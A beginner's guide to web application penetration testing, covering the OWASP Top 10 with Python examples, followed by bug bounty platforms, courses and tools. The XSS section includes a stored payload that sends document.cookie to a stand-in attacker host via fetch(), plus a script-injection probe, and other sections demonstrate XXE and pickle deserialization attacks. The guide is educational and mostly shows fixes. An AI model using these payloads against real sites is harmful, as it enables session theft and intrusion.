Newbie's guide to Web Application Penetration Testing


Today almost every organization hosts a website or web application so that its users can interact with it online. That application can be a company's greatest asset, but it can also be one of its greatest liabilities, because web applications are prone to many classes of vulnerability, from cross-site scripting to insecure default configurations and many more.

Web exploitation is the process of understanding how a web application works and leveraging that understanding to reach information or functionality that should not be accessible to unauthorized users. The weaknesses that make this possible come from poor coding on the backend, missing input validation, misconfiguration and many other causes. The most common categories are collected in the OWASP Top 10; the list below follows the 2017 edition.

1. Injection #

— Injection happens when untrusted data is sent to an interpreter (SQL, NoSQL, the OS shell, LDAP) as part of a command or query, so that the data changes the meaning of the command. The most common example is SQL injection, where the attacker places SQL syntax in an input field so that the query the application builds retrieves or modifies data it was never meant to.

2. Broken Authentication #

— Broken authentication occurs when authentication and session management functions are implemented poorly, for example by allowing weak or default passwords, not limiting login attempts, or exposing or accepting attacker-chosen session identifiers. It lets an attacker take over accounts and use the application as the victim.

3. Sensitive Data Exposure #

— Sensitive data exposure is a vulnerability where the web application does not properly protect sensitive information such as session tokens, cookies, passwords, location data and other personal data, either in transit (no TLS) or at rest (stored in plaintext or with a weak hash). A leak of such data can be very damaging for the affected users.
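An added example covering both of the previous two items (broken authentication and sensitive data exposure), not code from the original guide: passwords stored as salted PBKDF2 hashes instead of plaintext, a verification routine that runs in constant time and does not leak whether a username exists, and a login that issues a fresh random session token rather than accepting one from the client. The in-memory USERS and SESSIONS dictionaries stand in for database tables and are constructed for the example; the iteration count is deliberately low so it runs quickly.

```python
import hashlib
import hmac
import os
import secrets

# Constructed in-memory stores standing in for database tables.
USERS = {}
SESSIONS = {}

# Work factor for PBKDF2-HMAC-SHA256. Kept low here so the example runs fast;
# OWASP's Password Storage Cheat Sheet recommends 600,000 for production.
ITERATIONS = 50_000


def register(username, password):
    """Store a per-user random salt and a slow salted hash, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    USERS[username] = {"salt": salt, "hash": digest, "iterations": ITERATIONS}


def verify(username, password):
    """Check a password without leaking which part failed.

    The hash is computed even for unknown usernames so the response time does
    not reveal whether an account exists, and the comparison is constant-time
    so the result cannot be guessed byte by byte.
    """
    record = USERS.get(username)
    salt = record["salt"] if record else b"\x00" * 16
    expected = record["hash"] if record else b"\x00" * 32
    iterations = record["iterations"] if record else ITERATIONS
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected) and record is not None


def login(username, password):
    """On success, issue a fresh unguessable session token.

    The token is generated server-side; a client-supplied session id is never
    honoured, which is what closes session fixation.
    """
    if not verify(username, password):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def user_for_session(token):
    """Resolve a presented token back to a username, or None."""
    return SESSIONS.get(token)
```

Storing the iteration count next to the hash lets you raise the work factor later and re-hash users transparently on their next successful login.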

4. XML External Entities (XXE) #

— XML external entity (XXE) injection is a vulnerability that allows an attacker to interfere with an application's processing of XML data. By declaring an external entity in a submitted document, the attacker can make the parser read local files or send requests to internal systems and return the result in the response.
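An added example, not code from the original guide, showing the mechanism with Python's standard-library SAX parser: the same attacker document, which declares an entity pointing at a local file, is parsed once with external entity expansion enabled and once with it disabled. The "secret" file is created by the example itself and stands in for something like /etc/passwd or an application config file.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Collects every run of character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted(xml_bytes, allow_external_entities):
    """Parse XML from an untrusted source and return its text content.

    feature_external_ges decides whether <!ENTITY x SYSTEM "..."> declarations
    are fetched and expanded. Leaving it disabled (the default in current
    Python) is what prevents XXE; many parsers in other languages still
    default to enabled and must be switched off explicitly.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def xxe_demo():
    """Run the same attacker document through both parser configurations."""
    # Constructed secret file standing in for /etc/passwd or a config file.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("TOP-SECRET")
        secret_path = fh.name
    try:
        # Attacker-controlled document: declares an external entity that
        # points at a local file and references it inside a normal element.
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "{secret_path}">]>'
            "<order><item>&xxe;</item></order>"
        ).encode("utf-8")
        return {
            "entities_enabled": parse_untrusted(payload, True),
            "entities_disabled": parse_untrusted(payload, False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(xxe_demo())
```

In a real application the text collected here would end up in the HTTP response or an error message, which is how the attacker reads the file.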

5. Broken Access Control #

— Access control enforces that users cannot act outside their intended permissions. When a user can read or modify data or functions they should not have access to, for example another user's records by changing an ID in the URL, or administrative functions without the admin role, that is called broken access control.
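An added example, not code from the original guide: a request handler for an order lookup with only a "logged in" check (the classic insecure direct object reference), next to the same handler with an ownership check, plus a destructive action gated on role. The ORDERS and ROLES tables are constructed for the example.

```python
# Constructed data standing in for an orders table and a users table.
ORDERS = {
    101: {"owner": "alice", "total": 42.00},
    102: {"owner": "bob", "total": 99.99},
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "support"}


class Forbidden(Exception):
    """Raised for any request the caller is not entitled to make."""


def get_order_vulnerable(session_user, order_id):
    """Handler for GET /orders/<id> that only checks that someone is logged in.

    Alice can request /orders/102 and read Bob's order: an insecure direct
    object reference (IDOR), the most common form of broken access control.
    """
    if session_user is None:
        raise Forbidden("login required")
    return ORDERS.get(order_id)


def get_order(session_user, order_id):
    """Same handler with an ownership check (horizontal access control).

    Missing and foreign orders both raise Forbidden, so an attacker cannot
    tell which ids exist by comparing error responses.
    """
    if session_user is None:
        raise Forbidden("login required")
    order = ORDERS.get(order_id)
    if order is None:
        raise Forbidden(order_id)
    if order["owner"] != session_user and ROLES.get(session_user) != "support":
        raise Forbidden(order_id)
    return order


def delete_order(session_user, order_id):
    """Destructive action gated on role and checked on the server (vertical
    access control). Hiding the button in the UI is not a control."""
    if ROLES.get(session_user) != "support":
        raise Forbidden(order_id)
    return ORDERS.pop(order_id, None)
```

When testing an application for this, take two accounts of the same role, capture a request made by one, and replay it with the other's session; then repeat with a lower-privileged account against every admin-only endpoint.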

6. Security Misconfiguration #

— Security misconfiguration occurs when a web application runs with insecure default configurations, unnecessary features or accounts enabled, unpatched components, or verbose error messages that disclose stack traces and internal details, among many other misconfigurations that should be fixed.

7. Cross-Site Scripting #

— XSS or cross-site scripting occurs when an attacker can inject client-side script into web pages viewed by other users, so that the script runs in the victim's browser with the victim's session. There are 3 main types of XSS attacks

○ Reflected XSS: The injected malicious script comes from the current HTTP request, for example a search parameter that is echoed back in the response

○ Stored XSS: The injected malicious script comes from the website's database, for example a comment the attacker saved earlier that is shown to every visitor

○ DOM-based XSS: The vulnerability is in the page's own client-side JavaScript, which writes attacker-controlled data (such as part of the URL) into the DOM without the server ever seeing the payload
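An added example, not code from the original guide, covering the reflected and stored cases from the server side: a results page built by string concatenation, which echoes both the search parameter and stored comments verbatim, next to the same page with every untrusted value HTML-encoded at output time. The comment list is constructed; attacker.example is a reserved example domain.

```python
import html

# Constructed comment store; the second entry was submitted by an attacker
# and is now served to every visitor (stored XSS).
COMMENTS = [
    "Great product!",
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
]


def render_vulnerable(search_term):
    """Builds the results page by concatenation.

    The search term from the request is echoed verbatim (reflected XSS) and
    the comments from the database are echoed verbatim (stored XSS), so HTML
    or script in either runs in the victim's browser.
    """
    items = "".join(f"<li>{c}</li>" for c in COMMENTS)
    return (
        f"<h1>Results for {search_term}</h1>"
        f'<input name="q" value="{search_term}">'
        f"<ul>{items}</ul>"
    )


def render_safe(search_term):
    """Same page with every untrusted value HTML-encoded at the point of output.

    html.escape(quote=True) turns < > & " ' into entities, which covers text
    content and double-quoted attribute values. Other contexts (inside a
    <script> block, a URL, or CSS) need their own encoders, and a
    Content-Security-Policy header limits the damage if one is missed.
    """

    def esc(value):
        return html.escape(value, quote=True)

    items = "".join(f"<li>{esc(c)}</li>" for c in COMMENTS)
    return (
        f"<h1>Results for {esc(search_term)}</h1>"
        f'<input name="q" value="{esc(search_term)}">'
        f"<ul>{items}</ul>"
    )


if __name__ == "__main__":
    probe = '"><script>alert(document.domain)</script>'
    print(render_vulnerable(probe))
    print(render_safe(probe))
```

The probe string above is the usual first test: the leading `">` breaks out of the attribute value, so a page that reflects it unencoded is vulnerable in both the text and the attribute context.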

8. Insecure Deserialization #

— Insecure deserialization is a vulnerability that occurs when untrusted data is deserialized into application objects. A crafted serialized object can break the logic of the application and, when suitable classes are reachable, lets the attacker execute commands on the server remotely.
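An added example, not code from the original guide, using Python's pickle because it shows the failure mode in a few lines: a serialized object whose `__reduce__` makes the loader call an arbitrary function, the unsafe `pickle.loads` that runs it, a restricted unpickler that refuses any global not on an allow-list, and the preferable fix of using a data-only format. The gadget calls the harmless `os.getcwd` here; the attacker's version would reference `os.system` with a command string.

```python
import io
import json
import os
import pickle
from collections import OrderedDict


class Gadget:
    """When unpickled, pickle calls the callable returned by __reduce__.

    os.getcwd is used because it is harmless; an attacker would reference
    os.system or subprocess.check_output with a command string instead, and
    the very same pickle.loads call would execute it.
    """

    def __reduce__(self):
        return (os.getcwd, ())


def build_payload():
    """Serialise a gadget.

    The bytes carry only a module/function reference to getcwd and an empty
    argument tuple, not the Gadget class, so the receiver needs none of our
    code to be affected.
    """
    return pickle.dumps(Gadget())


def load_vulnerable(data):
    """pickle.loads on attacker-controlled bytes: the payload runs here."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global reference that is not on an explicit allow-list."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_json(data):
    """Preferred fix: a data-only format with no code-execution path at all."""
    return json.loads(data)


def ordered_sample():
    """A legitimate pickle that needs an allowed global in order to load."""
    return pickle.dumps(OrderedDict(a=1, b=2))
```

The same pattern exists in Java (ObjectInputStream), PHP (unserialize) and .NET (BinaryFormatter); the fix is always to avoid deserializing untrusted input into objects, or to enforce a strict allow-list of types if you must.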

9. Using Components with Known Vulnerabilities #

— Using components with known vulnerabilities means running frameworks, libraries and other software modules that have published vulnerabilities. Because these components run with the same privileges as the application, an attacker who exploits one can obtain user or admin level access to the application and its data.

10. Insufficient Logging and Monitoring #

— Insufficient logging and monitoring lets attackers probe systems, attack them further and maintain persistence, because without adequate logs and alerting nobody notices that an attack has happened and the attacker keeps their access.
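An added example, not code from the original guide, of the kind of monitoring this item asks for: a small detector that parses web server access logs in the common combined format and alerts on any source that produces a burst of 401 or 404 responses, which is what a password-guessing run or a directory brute-force (gobuster, ffuf and similar tools are discussed later in this guide) looks like. The log lines are constructed for the example and use documentation IP ranges.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines in combined format. Three sources: a directory
# brute-force (burst of 404s), a password-guessing run against /login (burst
# of 401s) and an ordinary visitor who hit one broken image link.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.5"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.5"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /config HTTP/1.1" 404 153 "-" "gobuster/3.5"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /.git HTTP/1.1" 404 153 "-" "gobuster/3.5"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /old HTTP/1.1" 404 153 "-" "gobuster/3.5"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /uploads HTTP/1.1" 200 812 "-" "gobuster/3.5"
198.51.100.9 - - [10/Oct/2023:13:58:01 +0000] "POST /login HTTP/1.1" 401 48 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:58:02 +0000] "POST /login HTTP/1.1" 401 48 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:58:03 +0000] "POST /login HTTP/1.1" 401 48 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:58:04 +0000] "POST /login HTTP/1.1" 401 48 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:58:05 +0000] "POST /login HTTP/1.1" 401 48 "-" "python-requests/2.31"
192.0.2.4 - - [10/Oct/2023:14:01:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.4 - - [10/Oct/2023:14:01:12 +0000] "GET /missing.png HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Status codes worth counting per source, and what a burst of them suggests.
SIGNALS = {
    401: "credential brute force",
    403: "forbidden-path probing",
    404: "content discovery",
}


def parse_line(line):
    """Return the fields the detector needs, or None for a line that does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect(log_text, window=timedelta(seconds=60), threshold=5):
    """Flag any source IP that produced at least `threshold` responses with the
    same interesting status code inside a sliding time `window`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["status"] in SIGNALS:
            events[(ev["ip"], ev["status"])].append(ev["ts"])

    alerts = {}
    for (ip, status), stamps in events.items():
        stamps.sort()
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                alerts[ip] = (
                    f"{SIGNALS[status]}: {threshold}+ HTTP {status} responses "
                    f"within {int(window.total_seconds())}s"
                )
                break
    return alerts


if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG).items():
        print(ip, reason)
```

Thresholds and window sizes are assumptions for the example and would be tuned to the site's normal traffic; the point is that the raw material (source, path, status, timestamp) must be logged in the first place, and that someone or something must look at it.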

Bug Bounty #

A bug bounty program is an offer made by many organizations that allows individuals to look for vulnerabilities in their websites (within a predefined scope) and report them to the company in exchange for a reward.

Where to sign up and start Bug bounty hunting


HackerOne is a great platform to get started with bug bounty hunting. They also provide lessons for beginners, and when you finish a certain number of Hacker101 CTF challenges and earn around 26 points, you receive a private invitation to join a private program.


Bugcrowd is another great platform to get started with bug bounty hunting.


Intigriti offers bug bounty and agile penetration testing services powered by Europe's leading network of ethical hackers.


Synack Red Team: the power behind the Synack platform is an elite team of top cybersecurity researchers, drawn from over 80 countries, recruited for their skill and chosen based on trust.

Where to learn Web Application Pentesting / Bug Bounty Hunting #

PortSwigger Web Academy

— This is one of the best platforms for learning how to hack websites. It provides free learning material and hands-on labs where you apply what you have learned.

— Topics Covered:

○ SQL Injection

○ Cross-site scripting

○ Cross-site request forgery (CSRF)

○ Clickjacking

○ DOM-based vulnerabilities

○ Cross-origin resource sharing (CORS)

○ XML external entity (XXE) injection

○ Server-side request forgery (SSRF)

○ HTTP request smuggling

○ OS command injection

○ Server-side template injection

○ Directory traversal

○ Access control vulnerabilities

○ Authentication

○ WebSockets

○ Web cache poisoning

○ Insecure deserialization

○ Information disclosure

○ Business logic vulnerabilities

○ HTTP Host header attacks

○ OAuth authentication

Hacker101 is a free class for web security. Whether you are a programmer with an interest in bug bounties or a seasoned security professional, Hacker101 has something to teach you.


— Website Hacking / Penetration Testing and Bug Bounty Hunting by Zaid Sabih, zSecurity

— Intro to Bug Bounty Hunting and Web Application Hacking by Ben Sadeghipour aka NahamSec


— Web Fundamentals Path

— Web Hacking Fundamentals

Common tools in bug bounty hunting #


— Burp Suite is the best-known tool among bug hunters and one of the most popular penetration testing and vulnerability-finding tools. It sits between your browser and the target as an intercepting proxy so you can inspect, modify and replay every request. There is a free Community edition and a Professional edition, which adds the automated scanner and removes the rate limiting on Intruder attacks, among other options.

Gobuster / Dirbuster

— These tools brute-force hidden directories and files on a web server from a wordlist. Such paths often expose backups, admin panels or other information that should not be publicly available.


— Dirsearch is a command-line tool designed to brute-force directories and files on web servers. It is written in Python and runs on Windows, Linux and macOS.


— Short for "Fuzz Faster U Fool", ffuf is an open-source web fuzzer written in Go. It is used for discovering directories and files, virtual hosts and parameters, and can fuzz any position in a request that you mark with the FUZZ keyword.


— Aquatone is a tool for visual inspection of websites across many hosts. It takes screenshots and gathers information about an HTTP-based attack surface quickly, which helps when triaging hundreds of discovered subdomains.


— Subfinder is a subdomain discovery tool that returns valid subdomains for a target domain using passive sources. It is simple to use and optimized for speed.


— OWASP Amass is an open-source network mapping and attack surface discovery tool. It combines information-gathering techniques such as passive data sources, DNS enumeration and scraping to collect as much data about the target as possible.


— Nuclei is a fast scanner that sends requests to targets based on YAML templates. Because each template matches on specific responses, the results are reproducible and false positives are rare. It provides effective scanning for known vulnerabilities, misconfigurations and exposed paths.